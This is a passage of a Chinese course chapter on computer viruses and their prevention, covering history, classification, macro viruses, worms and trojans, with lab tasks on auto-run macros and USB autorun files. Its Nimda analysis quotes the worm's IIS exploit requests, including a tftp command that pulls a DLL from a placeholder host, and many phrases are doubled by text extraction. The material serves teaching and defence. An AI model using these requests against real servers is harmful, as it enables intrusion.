1、第九章第九章 计算机病毒与防御计算机病毒与防御指导教师:李云亮指导教师:李云亮网络安全防护体系构架网络安全评估安全防护网络安全服务系统漏洞扫描网络管理评估病毒防护体系网络监控数据保密网络访问控制应急服务体系安全技术培训数据恢复网络安全防护体系构架本章要求 掌握计算机病毒的概念及意义 了解计算机病毒的发展史与危害 熟悉计算机病毒的主要特性 掌握计算机病毒的分类、查杀与防范方法。4|Presentation Title|Month 2009本章任务:完成三个Task有关病毒的实验 任务要求:通过建立自动宏,了解宏病毒的工作任务要求:通过建立自动宏,了解宏病毒的工作原理。原理。任务扩展:任务扩展:考
2、虑能否利用自动宏启动其他程序?考虑能否利用自动宏启动其他程序?考虑自动宏能否禁止?考虑自动宏能否禁止?任务要求:通过建立任务要求:通过建立U盘自动运行文件,了解盘自动运行文件,了解U盘盘病毒的工作原理。病毒的工作原理。任务扩展:任务扩展:考虑能否利用自动启动文件启动其他程序?考虑能否利用自动启动文件启动其他程序?考虑能在考虑能在U U盘中实现免疫功能吗?盘中实现免疫功能吗?任务要求:掌握软件的安装、配置及使用方法。任务要求:掌握软件的安装、配置及使用方法。8|Presentation Title|Month 2009认识计算机病毒2005年影响中国网络安全的十大热点事件之一年影响中国网络安全的
3、十大热点事件之一“MSN性感鸡”,网络提前遭遇“禽流感”狙击波,与时间赛跑的病毒狙击波,与时间赛跑的病毒 Worm.Zotob.a Worm.sasserWorm.Blaster.F 手机病毒过百手机病毒过百 自从2004年6月第一次发现在智能手机上传播的病毒以后,手机恶意程序的数量大幅提升。在手机上传播的病毒已经跨越100个大门,达到102个。目前手机病毒主要采用蓝牙、电子邮件、链接PC以及浏览互联网下载安装软件等多种方式传播。以损坏联系人名单、损耗电池、盗取资料和浪费话费等破坏为多。金山毒霸手机版(KingsoftMobileSecrity)猫癣病毒带来的灰色产业链二次分工2009年1月1
4、8日,金山毒霸云安全中心在国内率先发布“猫癣”节前病毒预警。2月3日,春节前小范围爆发的“猫癣”在春节期间疯狂传播,变种数量多达500个,平均每天全国就有40万台电脑染毒。最明显的中毒症状:电脑桌面上出现usp10.dll文件、迅雷无法启动及安全软件自动关闭,并且伴随网游帐号被盗。目标囊括魔兽世界、大话西游onlineII、剑侠世界、封神榜II、完美系列游戏、梦幻西游、魔域等主流游戏,对用户的虚拟财产影响巨大。木马/病毒背后早已日渐形成一条巨大的黑色产业链。不管是网银中真实的钱,还是虚拟财产,制造木马、传播木马、盗窃账户信息、第三方平台销赃、洗钱,他们的分工明确,形成了一个非常完善的流水性作业
5、的程序。央视3.15晚会曝光网银诈骗 3月15日,央视315晚会曝光一名叫“顶狐”的黑客,通过自己制造木马程序,盗取大量用户的网上银行信息,用很低廉的价格在网上出售,危及大量网银用户的安全。央视315晚会报道,“顶狐”通过木马程序,盗取个人的网银信息,后对盗取回来的信息分类整理,将密码等信息廉价出售,而网上银行用户信息则以400元每G的价格打包售出。这导致大量的网银用户存款被盗。沦为“肉鸡”的电脑,除了央视315晚会曝光的网银帐号受到威胁外,黑客还可以轻易获得用户的炒股帐号、网游帐号密码等信息。此外,远程控制用户的摄像头,曝光隐私;窃取“肉鸡”电脑里的虚拟财产以及商业机密。为了维护整个互联网安
6、全环境,让广大网民摆脱“肉鸡”威胁,金山毒霸紧急研发了完全免费的“肉鸡检测器”,全面剿杀肉鸡。14|Presentation Title|Month 2009了解计算机病毒9.1.1 计算机病毒的定义计算机病毒的定义 在在中华人民共和国计算机信息系统安全保中华人民共和国计算机信息系统安全保护条例护条例中被明确定义,计算机病毒是中被明确定义,计算机病毒是“指编制指编制或者在计算机程序中插入的破坏计算机功能或者或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码一组计算机指令或者程序代码”。从广义上
7、讲,一些恶意程序虽然不能自我复制,但会对计算机系统产生破坏或严重损害计算机使用者的利益,这些程序往往也被归类为计算机病毒,如木马程序等。思考与讨论思考与讨论 不按正常步骤操作计算机、玩游戏、不按正常步骤操作计算机、玩游戏、上网和收发邮件,这些行为会产生计算机上网和收发邮件,这些行为会产生计算机病毒吗?病毒吗?9.1.2 计算机病毒的发展史计算机病毒的发展史计算机病毒的产生的思想基础和病毒发展简介实验室中产生病毒的祖先(磁芯大战)计算机病毒的出现我国计算机病毒的出现 1.计算机病毒的产生计算机病毒的产生 最早提出电脑病毒概念的是电脑的先最早提出电脑病毒概念的是电脑的先驱者冯驱者冯诺伊曼。在他的一
8、篇论文诺伊曼。在他的一篇论文复杂复杂自动装置的理论及组识的进行自动装置的理论及组识的进行里,勾勒里,勾勒出病毒程序自我繁殖的基本原理。不过在出病毒程序自我繁殖的基本原理。不过在当时,绝大部分的电脑专家都无法想像会当时,绝大部分的电脑专家都无法想像会有这种能自我繁殖的程序。有这种能自我繁殖的程序。病毒的提出病毒的提出病毒的祖先磁芯大战 三个年轻的程序员在工作之余设计出一种电三个年轻的程序员在工作之余设计出一种电子游戏叫做子游戏叫做“磁芯大战磁芯大战”。玩这个游戏的两个人编玩这个游戏的两个人编制许多能自身复制并可保存在磁芯存储器中的程制许多能自身复制并可保存在磁芯存储器中的程序,然后发出信号,双方
9、的程序在指令控制下就序,然后发出信号,双方的程序在指令控制下就会竭力去消灭对方的程序,在预定时间内,谁的会竭力去消灭对方的程序,在预定时间内,谁的程序繁殖的多,谁就胜。这种有趣的游戏很快传程序繁殖的多,谁就胜。这种有趣的游戏很快传播到其他电脑中心。虽然这种游戏对当时孤立的播到其他电脑中心。虽然这种游戏对当时孤立的电脑影响不大,但对网络系统却影响很大。因此,电脑影响不大,但对网络系统却影响很大。因此,玩玩“磁芯大战磁芯大战”的人默守誓言,不把游戏的细节公的人默守誓言,不把游戏的细节公开。开。磁芯大战磁芯大战病毒的产生原因编制人员出于一种炫耀和显示自己能力的目的某些软件作者出于版权保护的目的而编制
10、出于某种报复目的或恶作剧而编写病毒出于政治、战争的需要2.2.病毒的发展历程病毒的发展历程DOS引导阶段DOS可执行阶段伴随阶段多形阶段生成器、变体机阶段网络、蠕虫阶段视窗阶段宏病毒阶段邮件病毒阶段手持移动设备病毒阶段 时代划分时间总结第一代:传统病毒1986-1989DOS引导阶段、DOS可执行阶段第二代:混合病毒(超级病毒)1989-1991伴随、批次型阶段第三代:多态性病毒1992-1995幽灵、多形阶段、生成器、变体机阶段第四代:90年代中后宏病毒阶段、网络、蠕虫阶段新一代病毒:21世纪以来蠕虫已成为目前病毒的主流病毒的发展历程病毒的发展历程时间名称事件1987Brain(巴基斯坦大脑
11、)第一个病毒(软盘引导)1987黑色星期五病毒第一大规模爆发1988.11.2蠕虫病毒 第一个蠕虫计算机病毒 1990.1“4096”发现首例隐蔽型病毒,破坏数据1991 病毒攻击应用于战争 1991米开朗基罗第一个格式化硬盘的开机型病毒1992VCL-Virus Creation Laboratory病毒生产工具在美国传播时间名称事件1992年9月首例Windows病毒1995FAT病毒、幽灵、变形金刚多态性(基于)windows)1997宏病毒 传播方式增加(邮件等)1998CIH发现破坏计算机硬件病毒1999 Mellisahappy99邮件病毒2000红色代码黑客型病毒2001Nimd
12、a集中了所有蠕虫传播途径2002SQLSPIDA.B第一个攻击SQL服务器2003SQL_slammer利用SQL server数据库的漏洞2003.8.11冲击波集中了所有蠕虫传播途径2004震荡波Sasser利用缓冲区溢出传播蠕虫20年来破坏力最大的10种计算机病毒CIH(1998年)梅利莎(Melissa,1999年)爱虫(I love you,2000年)红色代码(Code red,2001年)SQL Slammer(2003年)冲击波(Blaster,2003年)大无级.F(Sobig.r,2003年)贝革热(Bagle,2004年)MyDoom(2004年)震荡波(Sasser,2
13、004年)9.1.39.1.3 计算机病毒的危害计算机病毒的危害计算机病毒造成巨大的社会经济损失影响政府职能部门正常工作的开展计算机病毒被赋予越来越多的政治意义利用计算机病毒犯罪现象越来越严重病毒带来的威胁 近年来全球重大电脑病毒疫情及损失的统计图:9.1.49.1.4 计算机病毒的特征计算机病毒的特征 破坏性破坏性 传染性传染性 隐蔽性隐蔽性 寄生性寄生性 可触发性可触发性可执行性可执行性9.2 计算机病毒的种类依据不同的分类标准,计算机病毒可以做不同的归类。常见的分类标准有:1.根据病毒依附的操作系统2.根据病毒的攻击方式3.根据病毒的传播媒介4.根据病毒的传播途径依据不同的分类标准,计算
14、机病毒依据不同的分类标准,计算机病毒可以做不同的归类。常见的分类标可以做不同的归类。常见的分类标准有:准有:根据病毒依附的操作系统根据病毒的攻击方式根据病毒的传播媒介根据病毒的传播途径9.2 计算机病毒的种类病毒攻击的操作系统Microsoft DOSMicrosoft Windows 95/98/MEMicrosoft Windows NT/2000/XPUnix(Linux)其他操作系统病毒的传播媒介存储介质网络邮件(SoBig)网页(RedLof)局域网(Funlove)远程攻击(Blaster)网络下载病毒的传播和感染对象感染引导区感染文件可执行文件OFFICE宏网页脚本(Java小程
15、序和ActiveX控件)网络蠕虫网络木马破坏程序其他恶意程序引导型病毒 文件型病毒 文件型病毒的特点是附着于正常程序文件,成为程序文件的一个外壳或部件。文件型病毒主要以感染文件扩展名为.com、.exe和.bat等可执行程序为主。大多数的文件型病毒都会把它们自己的代码复制到其宿主文件的开头或结尾处。红色代码 198.137.240.91(www.whitehouse.gov)计算机病毒引起是异常情况计算机病毒引起是异常情况 计算机系统运行速度明显降低 系统容易死机 文件改变、破坏 磁盘空间迅速减少 内存不足 系统异常频繁重启动 频繁产生错误信息常见病毒分析1引导记录病毒引导记录病毒 引导型病毒
16、的传播、破坏过程 引导型病毒实例:小球病毒 2文件型病毒文件型病毒文件型病毒的类型 文件型病毒的感染方式 .COM文件的感染.EXE文件的感染.SYS文件的感染 2.2.宏病毒的行为和特征宏病毒的行为和特征常见病毒分析 宏病毒是一种新形态的计算机病毒,也是一种跨平台式计算机病毒。可以在Windows、Windows 95/98/NT、OS/2、Macintosh 等操作系统上执行病毒行为。宏病毒的主要特征如下:宏病毒会感染.DOC文档和.DOT模板文件。宏病毒的传染通常是Word在打开一个带宏病毒的文档或模板时,激活宏病毒。多数宏病毒包含AutoOpen、AutoClose、AutoNew和A
17、utoExit等自动宏,通过这些自动宏病毒取得文档(模板)操作权。宏病毒中总是含有对文档读写操作的宏命令。宏病毒在.DOC文档、.DOT模板中以BFF(Binary File Format)格式存放,这是一种加密压缩格式,每个Word版本格式可能不兼容。宏病毒具有兼容性。宏病毒的特点 传播极快 制作、变种方便 破坏可能性极大 Word宏病毒,是近年来被人们谈论得宏病毒,是近年来被人们谈论得最多的一种计算机病毒。与那些用复杂的最多的一种计算机病毒。与那些用复杂的计算机编程语言编制的病毒相比,宏病毒计算机编程语言编制的病毒相比,宏病毒的防治要容易得多!在了解了的防治要容易得多!在了解了Word宏病
18、毒宏病毒的编制、发作过程之后,即使是普通的计的编制、发作过程之后,即使是普通的计算机用户,不借助任何杀毒软件,就可以算机用户,不借助任何杀毒软件,就可以较好地对其进行防冶。较好地对其进行防冶。宏病毒的防治和清除方法 查看“可疑”的宏 按使用习惯编制宏 防备Autoxxxx宏 小心使用外来的Word文档 使用选项“Prompt to Save Normal Template”(工具-选项-保存)查看宏代码并删除 将文档存储为RTF格式 设置Normal.dot的只读属性 Normal.dot的密码保护 使用OFFICE 的报警设置 3.3.网络化病毒的特点网络化病毒的特点网络化:传播速度快、爆发
19、速度快、面广隐蔽化:具有欺骗性(加密)多平台、多种语言新方式:与黑客、特洛伊木马相结合多途径:攻击反病毒软件变化快(变种)清除难度大 破坏性强 蠕虫病毒 通过网络传播的恶性病毒通过网络传播的恶性病毒,它具有病毒的一它具有病毒的一些共性些共性,如传播性如传播性,隐蔽性隐蔽性,破坏性等等破坏性等等,同时具有同时具有自己的一些特征,如不利用文件寄生(有的只自己的一些特征,如不利用文件寄生(有的只存在于内存中)存在于内存中),对网络造成拒绝服务,以及和对网络造成拒绝服务,以及和黑客技术相结合等等。黑客技术相结合等等。1.蠕虫病毒与其他病毒的区别普通病毒蠕虫病毒存在形式 寄存文件独立程序传染机制宿主程序
20、运行主动攻击传染目标本地文件网络计算机2.蠕虫病毒的特点破坏性强传染方式多(一种是针对企业的局域网,主要通过系统漏洞;另外一种是针对个人用户的,主要通过电子邮件,恶意网页形式迅速传播的蠕虫病毒。)传播速度快清除难度大 3.实例:2003蠕虫王4.4.病毒病毒实例实例NimdaNimda及解决方案之一及解决方案之一感染 Win 95/98/NT/2000 系统1.通过email 在internet临时文件夹中读取所有htm,h t m l 文 件 并 从 中 提 取 e m a i l 地 址,从信箱读取email并从中提取SMTP服务器,然后发送readme.eml。Nimda-Nimda-2
21、.利用 IIS、IE 的安全漏洞 CodeRedII会在IIS的几个可执行目录下放置root.exeNimda首先在udp/69上启动一个tftp服务器然后会作以下扫描:GET/scripts/root.exe?/c+dir HTTP/1.0GET/MSADC/root.exe?/c+dir HTTP/1.0GET/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0GET/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0一 旦 发 现 有 弱 点 的 系 统 就 使 用 类 似 下 面 的 命 令GET/scripts/root.e
22、xe?/c+tftp-i xxx.xxx.xxx.xxx G E T A d m i n.d l l H T T P/1.0把文件传到主机上去,然后再GET/scripts/Admin.dll HTTP/1.0 Nimda-Nimda-3.通过WWW服务 在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml,并在文件末加上下面这一行window.open(readme.eml,null,resizable=no,top=6000,left=6000)也就是说如果一台web服务器被感染了,那么大部分访问过
23、此服务器的机器都会被感染。Nimda-Nimda-4.通过局域网的共享 Nimda会搜索本地的共享目录中包含doc文件的目录,一但找到,就会把自身复制到目录中命名为riched20.dll 病毒病毒实例实例NimdaNimda及解决方案及解决方案首先对网络中的工作站进行全面清查对已感染的工作站进行彻底的杀毒,然后对已染毒的服务器杀毒以保证整个网络系统是干净的;对网络中的服务器及工作站进行软件升级等一系列后续工程,杜绝再次染毒打微软IIS、IE的补丁最后着重对服务器进行本地安全策略的设置,做好防范工作,做到即使服务器再次中毒也不能影响整个服务器的正常工作及整个网络系统的正常运转。木马病毒木马是一
24、种可以驻留在对方系统中的一种程序。木马一般由两部分组成:服务器端和客户端。驻留在对方服务器的称之为木马的服务器端,远程的可以连到木马服务器的程序称之为客户端。木马的功能是通过客户端可以操纵服务器,进而操纵对方的主机。木马来自于“特洛伊木马”,英文名称为Trojan Horse。传说希腊人围攻特洛伊城,久久不能攻克,后来军师想出了一个特洛伊木马计,让士兵藏在巨大的特洛伊木马中部队假装撤退而将特洛伊木马丢弃在特洛伊城下,让敌人将其作为战利品拖入城中,到了夜里,特洛伊木马内的士兵便趁着夜里敌人庆祝胜利、放松警惕的时候从特洛伊木马里悄悄地爬出来,与城外的部队里应外合攻下了特洛伊城。由于特洛伊木马程序的
25、功能和此类似,故而得名。木马程序在表面上看上去没有任何的损害,实际上隐藏着可以控制用户整个计算机系统、打开后门等危害系统安全的功能。木马的发展木马的发展木马程序技术发展至今,已经经历了木马程序技术发展至今,已经经历了4代代第一代,即是简单的密码窃取,发送等。第二代木马,在控制技术上有了很大的进步,冰河冰河可以说为是国内木马的典型代表之一。第三代木马在数据传输技术上,又做了不小的改进,出现了ICMP等类型的木马,利用畸形报文传递数据,增加了查杀的难度。第四代木马在进程隐藏方面,做了大的改动,采用了内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程。常见的简单得木马有常见的简单得木马有Ne
26、tBus远程控制、远程控制、“冰冰河河”木马、木马、PCAnyWhere远程控制等等。这里远程控制等等。这里介绍一种最常见的木马程序:介绍一种最常见的木马程序:“冰河冰河”。“冰河冰河”包含两个程序文件,一个是服务器端,另一个包含两个程序文件,一个是服务器端,另一个是客户端。是客户端。58|Presentation Title|Month 2009计算机病毒防治反病毒技术简述计算机病毒诊断技术计算机病毒诊断技术 1校验和法诊断 2扫描法诊断 3行为监测法诊断 4分析法诊断五、病毒的预防措施 安装防病毒软件 定期升级防病毒软件 不随便打开不明来源 的邮件附件 尽量减少其他人使用你的计算机 及时打
27、系统补丁 从外面获取数据先检察 建立系统恢复盘 定期备份文件 综合各种防病毒技术服务器端防毒客户端防毒防毒防毒集中集中管理器管理器Mail Server全方位的网络全方位的网络病毒防护体系病毒防护体系Meb Server File Server网络病毒的特点及传播方式网络病毒的特点 网络病毒的传播方式 v 全网统一配置防毒策略。v 全网统一查杀病毒,没有死角。v 全网统一升级版本统一。v 全网防毒状况一目了然。v 跨平台技术,全方位防病毒v 全网防毒工作轻松简单:自动安装、自动维护、自动更新单机版与网络版的区别单机防毒网络防毒网络防毒选择防毒软件的标准选择防毒软件的标准“高侦测率”是基本条件,
28、“容易管理”是基本要求,未知病毒“隔离政策”是关键。病毒处理功能特色指标(高侦测率)v未知病毒检测能力、未知病毒清除能力 v压缩文件查毒(不限层数)、压缩文件清毒(不限层数)v打包文件查毒(不限层数)、打包文件清毒(不限层数)v内存查毒、内存清毒、运行文件清毒 v邮件接收检测、邮件发送检测 v邮件文件静态检测、邮件文件清毒 v邮箱静态检测、邮箱静态清毒 举例:SQL Slammer 病毒每 8.5 秒就会使 SQL服务器感染数成倍增长。如果只有高侦测率,无法在病毒入侵前的第一时间,自动部署安全策略常用的防病毒软件 Kv3000 瑞星:瑞星:Rishing NAINAI公司:公司:McAfee TVD McAfee TVD TrendMicroTrendMicro(趋势科技):趋势科技):SymantecSymantec公司:公司:Norton AntiVirusNorton AntiVirus著名杀毒软件公司的站点地址
